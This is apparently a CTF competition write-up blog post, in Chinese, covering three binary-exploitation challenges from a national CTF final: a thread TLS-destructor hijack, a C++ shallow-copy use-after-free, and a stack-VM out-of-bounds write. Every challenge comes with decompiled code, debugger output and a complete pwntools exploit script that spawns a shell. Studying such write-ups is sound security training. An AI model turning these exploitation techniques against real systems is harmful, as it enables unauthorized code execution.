国赛_final

国赛_final in武汉

第二次打线下了,出现了很多问题。现在的大比赛基本不怎么出heap相关的套路题目了(除了针对新版libc的一些利用方式和复杂的堆风水之外),比较常出的题型有vmpwn,异构架下(mips,arm)的pwn,C++程序以及一些底层机制的漏洞。同时逆向也随之增大。要加强自己的逆向功底了。

day1

第一天是awd,平台崩了,被迫停赛。我也不多bb平台了,着眼于题目吧(质量还是挺高的)。
按题目的难易程度来吧:

pwn3

一道线程pwn题。

1
2
3
4
5
6
while ( 1 )
  {
    if ( pthread_create(&newthread, 0LL, (void *(*)(void *))start_routine, 0LL) == -1 )
      puts("create thread failed");
    pthread_join(newthread, 0LL);
  }

漏洞在于start_routine里的__printf_chk存在fmt以及栈溢出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
unsigned __int64 __fastcall start_routine(void *a1)
{
  char v2; // [rsp+0h] [rbp-40h]
  unsigned __int64 v3; // [rsp+38h] [rbp-8h]
  __int64 retaddr; // [rsp+48h] [rbp+8h]

  v3 = __readfsqword(0x28u);
  ret_address = (__int64)&retaddr;
  save_ret = retaddr;
  gets(&v2);
  __printf_chk(1LL, (__int64)&v2);
  *(_QWORD *)ret_address = save_ret;
  return v3 - __readfsqword(0x28u);
}

__printf_chk函数会检测%n以及%()$()这样的的格式,因此只能用-%p-%p-这样泄露了。由于程序存在写回ret_addr的操作,导致栈溢出覆盖返回地址的方法失效了,这也是这道题的难点所在。

重点,记笔记:
在线程中存在一种TSL机制:如果需要在一个线程内部的各个函数调用都能访问、但其它线程不能访问的变量(被称为static memory local to a thread 线程局部静态变量),就需要新的机制来实现,这就是TLS。
我们熟知的canary就是存放在tls中,在ret时和stack中的canary比较。

其结构体为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
typedef struct
{
  void *tcb;		/* Pointer to the TCB.  Not necessarily the
			   thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;		/* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;  /*canary
  uintptr_t pointer_guard;
  unsigned long int vgetcpu_cache[2];
  /* Bit 0: X86_FEATURE_1_IBT.
     Bit 1: X86_FEATURE_1_SHSTK.
   */
  unsigned int feature_1;
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  /* The lowest address of shadow stack,  */
  unsigned long long int ssp_base;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

  void *__padding[8];
} tcbhead_t;

在内存中如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
rsp=0x7facd4d2bea8

telescope 0x7facd4d2c700 100
00:0000│ r8 r9  0x7facd4d2c700 ◂— 0x7facd4d2c700
01:0008│        0x7facd4d2c708 —▸ 0x563b164dc270 ◂— 0x1
02:0010│        0x7facd4d2c710 —▸ 0x7facd4d2c700 ◂— 0x7facd4d2c700
03:0018│        0x7facd4d2c718 ◂— 0x1
04:0020│        0x7facd4d2c720 ◂— 0x0
05:0028│        0x7facd4d2c728 ◂— 0xfe0c23c58eab1200
06:0030│        0x7facd4d2c730 ◂— 0x6bdca8fe08e79c2
07:0038│        0x7facd4d2c738 ◂— 0x0
... ↓
58:02c0│        0x7facd4d2c9c0 —▸ 0x7facd53382b0 (stack_used) ◂— 0x7facd4d2c9c0
... ↓
5a:02d0│ r10    0x7facd4d2c9d0 ◂— 0xb6c /* 'l\x0b' */
5b:02d8│        0x7facd4d2c9d8 —▸ 0x7facd4d2c9e0 ◂— 0x7facd4d2c9e0
... ↓
5d:02e8│        0x7facd4d2c9e8 ◂— 0xffffffffffffffe0
5e:02f0│        0x7facd4d2c9f0 ◂— 0x0
... ↓
60:0300│        0x7facd4d2ca00 —▸ 0x7facd4d2bf10 —▸ 0x7facd4d2c700 ◂— 0x7facd4d2c700
61:0308│        0x7facd4d2ca08 ◂— 0x0

可见,tls是在stack上的(比较下面),可以通过大范围的栈溢出覆盖。

之后我们发送’a’*0x38+p64(canary)+’a’*0x400(大范围的覆盖)之后查看程序的流程变化:

1
2
3
4
5
6
7
8
9
10
11
12
  0x563b14c06207 <start_routine+110>    nop
  0x563b14c06208 <start_routine+111>    mov    rax, qword ptr [rbp - 8]
  0x563b14c0620c <start_routine+115>    sub    rax, qword ptr fs:[0x28]
  0x563b14c06215 <start_routine+124>    je     start_routine+131 <start_routine+131>

  0x563b14c0621c <start_routine+131>    leave
0x563b14c0621d <start_routine+132>    ret             <0x7facd51256db; start_thread+219>

  0x7facd51256db <start_thread+219>     mov    qword ptr fs:[0x630], rax
  0x7facd51256e4 <start_thread+228>     call   __call_tls_dtors@plt <__call_tls_dtors@plt>

  0x7facd51256e9 <start_thread+233>     xor    eax, eax

其中__call_tls_dtors函数来析构线程本地存储,diassemble看下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
pwndbg> disassemble __call_tls_dtors
Dump of assembler code for function __GI___call_tls_dtors:
   0x00007facd4d70990 <+0>:	push   rbp
   0x00007facd4d70991 <+1>:	push   rbx
   0x00007facd4d70992 <+2>:	sub    rsp,0x8
   0x00007facd4d70996 <+6>:	mov    rbp,QWORD PTR [rip+0x3a73c3]        # 0x7facd5117d60
   0x00007facd4d7099d <+13>:	mov    rbx,QWORD PTR fs:[rbp+0x0]
   0x00007facd4d709a2 <+18>:	test   rbx,rbx
   0x00007facd4d709a5 <+21>:	je     0x7facd4d709ee <__GI___call_tls_dtors+94>
   0x00007facd4d709a7 <+23>:	nop    WORD PTR [rax+rax*1+0x0]
   0x00007facd4d709b0 <+32>:	mov    rdx,QWORD PTR [rbx+0x18]
   0x00007facd4d709b4 <+36>:	mov    rax,QWORD PTR [rbx]
   0x00007facd4d709b7 <+39>:	mov    rdi,QWORD PTR [rbx+0x8]
   0x00007facd4d709bb <+43>:	ror    rax,0x11
   0x00007facd4d709bf <+47>:	xor    rax,QWORD PTR fs:0x30
   0x00007facd4d709c8 <+56>:	mov    QWORD PTR fs:[rbp+0x0],rdx
   0x00007facd4d709cd <+61>:	call   rax
   0x00007facd4d709cf <+63>:	mov    rax,QWORD PTR [rbx+0x10]
   0x00007facd4d709d3 <+67>:	lock sub QWORD PTR [rax+0x450],0x1
   0x00007facd4d709dc <+76>:	mov    rdi,rbx
   0x00007facd4d709df <+79>:	call   0x7facd4d4e2c8 <free@plt>
   0x00007facd4d709e4 <+84>:	mov    rbx,QWORD PTR fs:[rbp+0x0]
   0x00007facd4d709e9 <+89>:	test   rbx,rbx
   0x00007facd4d709ec <+92>:	jne    0x7facd4d709b0 <__GI___call_tls_dtors+32>
   0x00007facd4d709ee <+94>:	add    rsp,0x8
   0x00007facd4d709f2 <+98>:	pop    rbx
   0x00007facd4d709f3 <+99>:	pop    rbp
   0x00007facd4d709f4 <+100>:	ret
End of assembler dump.

其中,mov rbx,QWORD PTR fs:[rbp+0x0]使得我们通过栈溢出改写tls的内容(也即fs),进而控制rbx,使得其不跳转并继续往下执行。
rax,QWORD PTR [rbx],rax也可控,只是要经过ror rax,0x11和xor rax,QWORD PTR fs:0x30的运算后结果为one_gadget,之后call rax拿shell。
因此我们就要提前布置好fs的内容。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *

context.arch='amd64'
context.log_level='debug'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def rol(value):
	low = (value&0xffff800000000000)>>47
	hight = (value&0x7fffffffffff)<<17
	return hight | low

def ror(value):
	hight = (value&0x1ffff)<<47
	low = (value&0xfffffffffffe0000)>>17
	return hight | low


def main(host,port=9999):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./pwn3")
		# p = process("./pwn",env={"LD_PRELOAD":"./x64_libc.so.6"})
		# gdb.attach(p,"b *0x0000000000400A5F")
		debug(0x0000000000011F1)
	p.sendline("+%p-%p-%p-%p%-%p-%p-%p-%p%-%p-%p-%p-%p-%p+%p=")
	p.recvuntil('+')
	libc.address = int(p.recvuntil('-')[:-1],16) - 0x3ed8d0
	info('libc : '+hex(libc.address))
	p.recvuntil('+')
	canary = int(p.recvuntil('=')[:-1],16)
	info('canary : '+hex(canary))

	sleep(0.3)

	payload = "%p"*(0x38/2)+p64(canary)
	p.sendline(payload)
	p.recvuntil(hex(libc.address-0x900)*2)
	p.recvuntil("0x")
	xor1 = int(p.recvuntil("0x")[:-2],16)
	p.recvuntil("(nil)(nil)")
	p.recvuntil("0x")
	p.recvuntil("0x")
	xor2 = int(p.recvuntil("0x")[:-2],16)
	# info("xor1: " + hex(xor1))
	info("xor2: " + hex(xor2))
	xor1 = libc.address-0x1100

	sleep(0.3)
	one = 0x4f3c2 + libc.address
	payload = "A"*0x38+p64(canary)*2+p64(one)
	payload += p64(0)+p64(libc.address-0x900)*2
	payload += p64(0)+p64(libc.address-0x1040)+p64(rol((ror(xor2)^xor1)^one))
	payload += p64(0)*0xe8+p64(0x3ec560+libc.address)+p64(libc.address-0x248)
	payload += p64(libc.address-0x10d8)*0x10+p64(libc.address-0x10d8)
	p.sendline(payload)

	p.interactive()

if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# libc = ELF("./x64_libc.so.6",checksec=False)
	# elf = ELF("./babyheap",checksec=False)
	main(args['REMOTE'])

pwn4

第二道就是一道C++的题目了,pwnable.tw上的原题CAOV。
漏洞在于浅拷贝导致的析构函数会dele存在于stack上的指针,而这个指针指向的是我们的password结构,从而在我们可以利用chang_password()形成类似于UAF的效果。

漏洞代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned __int64 edit_info()
{
  __int64 v0; // rbx
  __int64 v1; // rax
  __int64 v2; // rax
  char v4; // [rsp+0h] [rbp-50h]
  char v5; // [rsp+20h] [rbp-30h]
  unsigned __int64 v6; // [rsp+38h] [rbp-18h]

  v6 = __readfsqword(0x28u);
  initial((__int64)&v4);
  sub_401DDA((__int64)&v5, (__int64)&v4, (const char **)qword_6032A0);
  dele((__int64)&v5);    //bug
  v0 = sub_402164((__int64)&v4);
  v1 = std::operator<<<std::char_traits<char>>(&std::cout, "STUDENT: ");
  v2 = std::operator<<<std::char_traits<char>>(v1, v0);
  std::ostream::operator<<(v2, &std::endl<char,std::char_traits<char>>);
  sub_401E6C(qword_6032A0);
  dele((__int64)&v4);
  return __readfsqword(0x28u) ^ v6;
}

效果展示:

1
2
3
4
5
6
7
8
00:0000│ rsp      0x7ffc82d0fa50 —▸ 0x1985c60 ◂— 'PB19000001'
01:0008│          0x7ffc82d0fa58 ◂— 0x6400000064 /* 'd' */
... ↓
03:0018│          0x7ffc82d0fa68 ◂— 0x21 /* '!' */
04:0020│ rax rdi  0x7ffc82d0fa70 —▸ 0x6032f0 ◂— 0x0
05:0028│          0x7ffc82d0fa78 ◂— 0x21 /* '!' */
06:0030│          0x7ffc82d0fa80 ◂— 0x0
07:0038│          0x7ffc82d0fa88 ◂— 0x3fdc5116f3e23a00

位于rsp+0x20的位置存在的0x6032f0会被dele,由于我们提前change_password使得构造如下:

1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/20gx 0x6032e0
0x6032e0:	0x0000000000000000	0x0000000000000071
0x6032f0:	0x0000000000000000	0x0000000000000000
0x603300:	0x0000000000000000	0x0000000000000000
0x603310:	0x0000000000000000	0x0000000000000000
0x603320:	0x0000000000000000	0x0000000000000000
0x603330:	0x0000000000000000	0x0000000000000000
0x603340:	0x0000000000000000	0x0000000000000000
0x603350:	0x0000000000000000	0x0000000000000021
0x603360:	0x00000000006032f0	0x0000000000000021
0x603370:	0x0000000000000000	0x0000000000000000

从而会将其dele到0x70的fastbin。

之后我们考虑如何泄露:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
0x603270:	0x0000000000000000	0x0000000000000000
0x603280 <stderr>:	0x00007f37cc70b540	0x00007f37cc70b620
0x603290:	0x0000000000000000	0x0000000000000000
0x6032a0:	0x0000000001985c20	0x0000000000000000
0x6032b0:	0x0000000000000000	0x0000000000000000
0x6032c0:	0x0000006e696d6461	0x0000000000000000
0x6032d0:	0x0000000000000000	0x0000000000000000
0x6032e0:	0x0000000000000000	0x0000000000000071
0x6032f0:	0x0000000000000000	0x0000000000000000
0x603300:	0x0000000000000000	0x0000000000000000
0x603310:	0x0000000000000000	0x0000000000000000
0x603320:	0x0000000000000000	0x0000000000000000
0x603330:	0x0000000000000000	0x0000000000000000
0x603340:	0x0000000000000000	0x0000000000000000
0x603350:	0x0000000000000000	0x0000000000000021
0x603360:	0x00000000006032f0	0x0000000000000021
0x603370:	0x0000000000000000	0x0000000000000000

往上面看发现0x0000000001985c20为一个堆地址,其heap[0]位置的指针指向存放student’s name地址的地址,因此,我们可以通过UAF将堆申请到0x603280附件(正好有0x7f可以利用),然后修改0x0001985c20为一个存放read_got的地址,可以通过change_password实现。

效果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
pwndbg> x/30gx 0x6032e0-0x70
0x603270:	0x0000000000000000	0x0000000000000000
0x603280 <stderr>:	0x00007fa9e91f7540	0x00007fa9e91f7620
0x603290:	0x0000000000000000	0x0000000000000000
0x6032a0:	0x0000000000603300	0x0000000000000000
0x6032b0:	0x0000000000000000	0x0000000000000000
0x6032c0:	0x0000000000000000	0x0000000000000000
0x6032d0:	0x0000000000000000	0x0000000000000000
0x6032e0:	0x0000000000000000	0x0000000000000000
0x6032f0:	0x00000a0000000000	0x0000000000000000
0x603300:	0x0000000000602f38	0x4141414141414100
0x603310:	0x4141414141414141	0x4141414141414141
0x603320:	0x4141414141414141	0x4141414141414141
0x603330:	0x4141414141414141	0x4141414141414141
0x603340:	0x4141414141414141	0x4141414141414141
0x603350:	0x000000000000000a	0x0000000000000021
pwndbg> telescope 0x0000000000602f38
00:0000│   0x602f38 —▸ 0x7fa9e8f29310 (read) ◂— cmp    dword ptr [rip + 0x2d2429], 0
01:0008│   0x602f40 —▸ 0x7fa9e8f77b50 (__strncmp_sse42) ◂— test   rdx, rdx
02:0010│   0x602f48 —▸ 0x7fa9e8e52750 (__libc_start_main) ◂— push   r14
03:0018│   0x602f50 —▸ 0x7fa9e8e6c290 (__cxa_atexit) ◂— push   r12

leak之后利用uaf打malloc_hook,拿shell。
对了,add功能是通过edit info时修改name时的new实现的,dele功能是通过析构实现的。

ruan师傅的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
from pwn import *
context.log_level='debug'
context.arch='amd64'

def cmd(c):
	p.recvuntil("choice:")
	p.sendline(str(c))

def student(sno):
	p.recvuntil("please:")
	p.sendline(sno)
	p.sendlineafter("grade(0~100):",'1')
	for i in range(3):
		p.sendlineafter("grade:",'1')

def main(host,port=1234):
	global p
	if host:
	    p=remote(host,port)
	else:
	    p=process("./pwn4")
	name_addr = 0x00000000006032E0
	p.recvuntil("name:")
	p.sendline("admin")
	p.recvuntil("word:")
	p.send("p455w0rd")
	# gdb.attach(p)

	payload = ""
	payload += p64(0) + p64(0x71)
	payload = payload.ljust(0x70,"\x00")
	payload += p64(0) + p64(0x21)
	payload += p64(name_addr+0x10) + p64(0x21)
	cmd(1)
	p.recvuntil("word:")
	p.send(payload)
	student("aaa")

	cmd(2)
	p.recvuntil("word:")
	payload = p64(0) + p64(0x71)
	payload += p64(name_addr-0x5b)
	p.send(payload)

	cmd(1)
	p.recvuntil("word:")
	payload = '\x00'
	p.send(payload)
	student("A"*0x60)
	# gdb.attach(p)
	cmd(1)
	p.recvuntil("word:")
	payload = ""
	payload += p64(0) + p64(0x71)
	payload += p64(0)*2
	payload += p64(0x0000000000602F38)
	p.send(payload)
	payload = "\x00"*0xb+p64(name_addr+0x20)

	student(payload.ljust(0x60,"\x00"))
	# gdb.attach(p)
	cmd(1)
	p.recvuntil("word:")
	payload = '\x00'
	p.send(payload)
	p.recvuntil("STUDENT: ")

	libc.address = u64(p.recvuntil('\n',drop=True).ljust(8,b"\x00"))-libc.symbols["read"]
	success('libc : '+hex(libc.address))
	student("shabi")

	# gdb.attach(p)
	payload = ""
	payload += p64(0) + p64(0x71)
	payload += p64(name_addr+0x30)*12
	payload += p64(0) + p64(0x21)
	payload += p64(name_addr+0x10) + p64(0x21)
	cmd(1)
	p.recvuntil("word:")
	p.send(payload)
	student("shabi")

	cmd(2)
	p.recvuntil("word:")
	payload = p64(0) + p64(0x71)
	payload += p64(libc.symbols["__malloc_hook"]-0x23)
	p.send(payload)

	cmd(1)
	p.recvuntil("word:")
	payload = '\x00'
	p.send(payload)
	student(p64(name_addr+0x30)*12)

	cmd(1)
	p.recvuntil("word:")
	payload = '\x00'
	p.send(payload)
	one = 0xf1207+libc.address
	payload = "\x00"*0xb+p64(0)+p64(one)
	student(payload.ljust(0x60,"\x00"))


	payload = ""
	payload += p64(0) + p64(0x71)
	payload += p64(name_addr+0x30)*12
	payload += p64(0) + p64(0)
	payload += p64(name_addr) + p64(0)
	cmd(1)
	p.recvuntil("word:")
	p.send(payload)
	# gdb.attach(p)
	p.interactive()

if __name__ == '__main__':
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	main(args['REMOTE'])

ruan师傅nb!!

stackmachine

一道vm类型的题目,除了canary其他保护全开。
程序首先初始化了sp,pc,stack,data,code段,之后输入data和code,然后run(常规的VM格式)。
先来看下初始化的情况把:

1
2
3
4
5
6
pwndbg> x/20xg 0x1c48000
0x1c48000:	0x0000000000000000	0x0000000000000051
0x1c48010:	0x0000000000000000	0x0000000000000800  //pc & sp
0x1c48020:	0x0000000001c48060	0x0000000000001000  //satck & stack size
0x1c48030:	0x0000000001c49070	0x0000000000001000  //data  & data size
0x1c48040:	0x0000000001c4a080	0x0000000000001000  //code & code size

接下来就是逆指令了,我只把有用到的指令代码显示了出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
case 1u:
      if ( vm->_sp <= (unsigned __int64)(vm->stack_sz - 8) )
      {
        *(_QWORD *)(8 * ((unsigned __int64)vm->_sp >> 3) + vm->stack) = *(_QWORD *)(8LL* (*(_QWORD *)(vm->stack+8 *((unsigned __int64)vm->_sp >> 3)) >> 3)+ vm->data);
        goto LABEL_56;
      }
      result = 0xFFFFFFFFLL;
      break;
case 2u:
      if ( vm->_sp <= (unsigned __int64)(vm->stack_sz - 16) )// stack->data
      {
        *(_QWORD *)(vm->data + 8LL * (*(_QWORD *)(vm->stack + 8 * ((unsigned __int64)vm->_sp >> 3)) >> 3)) = *(_QWORD *)(vm->stack + 8 * (((unsigned __int64)vm->_sp >> 3) + 1));
        vm->_sp += 0x10LL;
        goto LABEL_56;
      }
      result = 0xFFFFFFFFLL;
      break;
case 3u:
      if ( vm->_sp <= (unsigned __int64)(vm->stack_sz - 16) )
      {
        v2 = *(_QWORD *)(vm->stack + 8 * ((unsigned __int64)vm->_sp >> 3))
           + *(_QWORD *)(vm->stack + 8 * (((unsigned __int64)vm->_sp >> 3) + 1));
        vm->_sp += 8LL;
        *(_QWORD *)(8 * ((unsigned __int64)vm->_sp >> 3) + vm->stack) = v2;
        goto LABEL_56;
      }
      result = 0xFFFFFFFFLL;
      break;
case 0xEu:
      if ( vm->_sp > 7uLL )
      {
        vm->_sp -= 8LL;
        *(_QWORD *)(8 * ((unsigned __int64)vm->_sp >> 3) + vm->stack) = *(_QWORD *)(vm->code + vm->_pc + 1);
        vm->_pc += 8LL;
        goto LABEL_56;
      }
      result = 0xFFFFFFFFLL;
      break;

解释一下
0xe:将code段里数据放入stack段中,pc+=8(相当于push)。
0x1:将以data为基地址以stack为偏移的地址的内容放入stack中。
0x2:将stack顶的数据放入以data为基地址,以stack顶的后一个的数据为偏移的地址处。(由于stack的内容可控,因此存在越界写)。
0x3:将stack里的两数相加并存入栈顶。

解体思路:
1.通过观察初始的状态可以发现:data_ptr=0x01c49070,和该指针存在的结构体的位置:0x1c48030偏移为-0x1040,因此我们可以再开始时将stack中填入puts_got+offset(0x10000000000000000-0x1040),之后再执行2操作即可修改data_ptr为puts_got。

2.由于data_ptr被修改为puts_got,因此我们在stack里放入1作为偏移,再执行1操作即可将Libc里的地址写入stack里。

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> x/20gx 0x807000
0x807000:	0x0000000000000000	0x0000000000000051
0x807010:	0x000000000000001c	0x00000000000007f8
0x807020:	0x0000000000807060	0x0000000000001000
0x807030:	0x0000000000601fa0	0x0000000000001000
0x807040:	0x0000000000809080	0x0000000000001000
0x807050:	0x0000000000000000	0x0000000000001011
0x807060:	0x0000000000000000	0x0000000000000000
0x807070:	0x0000000000000000	0x0000000000000000
0x807080:	0x0000000000000000	0x0000000000000000
0x807090:	0x0000000000000000	0x0000000000000000
pwndbg> telescope 0x0000000000807060+0x7f8
00:0000│ rdx  0x807858 —▸ 0x7efdc21586a0 (puts) ◂— push   r12

3.之后我们通过+运算将其改为one_gadget,然后再通过步骤2在stack里写入一个libc的地址,这个地址将作为后面的offset。

由于题目保护无法改写got表,ruan师傅教我了个新姿势:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
────────────────────────────────────────[ DISASM ]─────────────────────────────────────────
   0x7f118c176b24 <_dl_fini+52>     lea    rcx, [rip + 0x215515] <0x7f118c38c040>
   0x7f118c176b2b <_dl_fini+59>     shl    rax, 4
   0x7f118c176b2f <_dl_fini+63>     lea    r12, [rcx + rax - 0x88]
   0x7f118c176b37 <_dl_fini+71>     jmp    _dl_fini+119 <_dl_fini+119>

   0x7f118c176b67 <_dl_fini+119>    lea    rdi, [rip + 0x215dda] <0x7f118c38c948>
 ► 0x7f118c176b6e <_dl_fini+126>    call   qword ptr [rip + 0x2163d4] <rtld_lock_default_lock_recursive>
        rdi: 0x7f118c38c948 (_rtld_global+2312) ◂— 0x0
        rsi: 0x0
        rdx: 0x7f118c176af0 (_dl_fini) ◂— push   rbp
        rcx: 0x7f118c38c040 (_rtld_global) —▸ 0x7f118c38d168 ◂— 0x0

   0x7f118c176b74 <_dl_fini+132>    mov    ecx, dword ptr [r12]
   0x7f118c176b78 <_dl_fini+136>    test   ecx, ecx
   0x7f118c176b7a <_dl_fini+138>    je     _dl_fini+80 <_dl_fini+80>

   0x7f118c176b7c <_dl_fini+140>    mov    rax, qword ptr [r12 - 8]
   0x7f118c176b81 <_dl_fini+145>    movzx  edx, byte ptr [rax + 0x315]
─────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ rsp  0x7ffe200d3a80 —▸ 0x7f118c161620 (_IO_2_1_stdout_) ◂— 0xfbad2887
01:0008│      0x7ffe200d3a88 ◂— 0x1
02:0010│      0x7ffe200d3a90 —▸ 0x7f118c1616a3 (_IO_2_1_stdout_+131) ◂— 0x162780000000000a /* '\n' */
03:0018│      0x7ffe200d3a98 —▸ 0x7ffe200d3c30 ◂— 0x1
04:0020│      0x7ffe200d3aa0 ◂— 0x0
05:0028│      0x7ffe200d3aa8 —▸ 0x7f118be16419 (_IO_do_write+121) ◂— mov    r13, rax
06:0030│      0x7ffe200d3ab0 —▸ 0x7ffe200d3c30 ◂— 0x1
07:0038│      0x7ffe200d3ab8 —▸ 0x7f118c161620 (_IO_2_1_stdout_) ◂— 0xfbad2887
───────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
 ► f 0     7f118c176b6e _dl_fini+126
   f 1     7f118bdd6008 __run_exit_handlers+232
   f 2     7f118bdd6055
   f 3     7f118bdbc847 __libc_start_main+247
───────────────────────────────────────────────────────────────────────────────────────────
pwndbg> telescope 0x7f118c176b74+0x2163d4
00:0000│   0x7f118c38cf48 (_rtld_global+3848) —▸ 0x7f118c166c90 (rtld_lock_default_lock_recursive) ◂— add    dword ptr [rdi + 4], 1
01:0008│   0x7f118c38cf50 (_rtld_global+3856) —▸ 0x7f118c166ca0 (rtld_lock_default_unlock_recursive) ◂— sub    dword ptr [rdi + 4], 1
02:0010│   0x7f118c38cf58 (_rtld_global+3864) —▸ 0x7f118c17a0e0 (_dl_make_stack_executable) ◂— push   rbp
03:0018│   0x7f118c38cf60 (_rtld_global+3872) ◂— 0x6
04:0020│   0x7f118c38cf68 (_rtld_global+3880) ◂— 0x1
05:0028│   0x7f118c38cf70 (_rtld_global+3888) —▸ 0x7f118c3708f8 ◂— 0x40 /* '@' */

在执行exit函数时,一直步入进去看到即将call的位置是rtld_lock_default_lock_recursive:

0x7f118c38cf48 (_rtld_global+3848) —▸ 0x7f118c166c90 (rtld_lock_default_lock_recursive)
这种和got表的结构类似,因此我们只要改0x7f118c38cf48 (_rtld_global+3848)指向one_gadget即可拿shell,但这个地址是lib/x86_64-linux-gnu/ld-2.23.so里的地址,虽然本地是和libc基地址的偏移固定,但远程往往是不固定的,相差0x1000的整数倍,得通过爆破解决。

4.本地既然和libc偏移固定,就会和libc里的puts偏移固定,而0x0000000000601fa0又是一个固定的地址,因此只要通过’+’运算构造地址为0x7f118c38cf48 (_rtld_global+3848)-0x0000000000601fa0,最后执行2操作即可。

构造结果:

1
2
3
pwndbg> telescope 0x0000000000e10060+0x7f0
00:0000│   0xe10850 ◂— 0x7f118bd8afa8   //offset
01:0008│   0xe10858 —▸ 0x7f118be8d207 (exec_comm+2263)  //one_gadget

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'

def main(host,port = 123):
	global p
	if host:
		p=remote(host,port)
	else:
		p=process("./StackMachine")

	gdb.attach(p)
	one = 0xf1207
	offset=one-0x06f6a0
	p.recvuntil("stack size >")
	p.sendline(str(0x1000))
	p.recvuntil("data size >")
	p.sendline(str(0x1000))
	p.recvuntil("initial data >")
	p.sendline(str(-0x1040))
	p.recvuntil("code size >")
	p.sendline(str(0x1000))
	p.recvuntil("initial code >")
	# gdb.attach(p)
	# p.send(p8(0xe)+p64(0x601FA0)+p8(0xe)+p64(0x10000000000000000-0x1040)+p8(2))
	p.send(p8(0xe)+p64(0x601FA0)+p8(0xe)+p64(0x10000000000000000-0x1040)+p8(2)+p8(0xe)+p64(1)+p8(1)+p8(0xe)+p64(offset)+p8(3)+p8(0xe)+p64(1)+p8(1)+p8(0xe)+p64(0x5812a8)+p8(3)+p8(0xe)+p64(0x10000000000000000-0x0000000000601fa0+0x600)+p8(3)+p8(2))

	p.interactive()

if __name__ == '__main__':
	libc=ELF("./libc.so.6")
	main(args['REMOTE'])

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>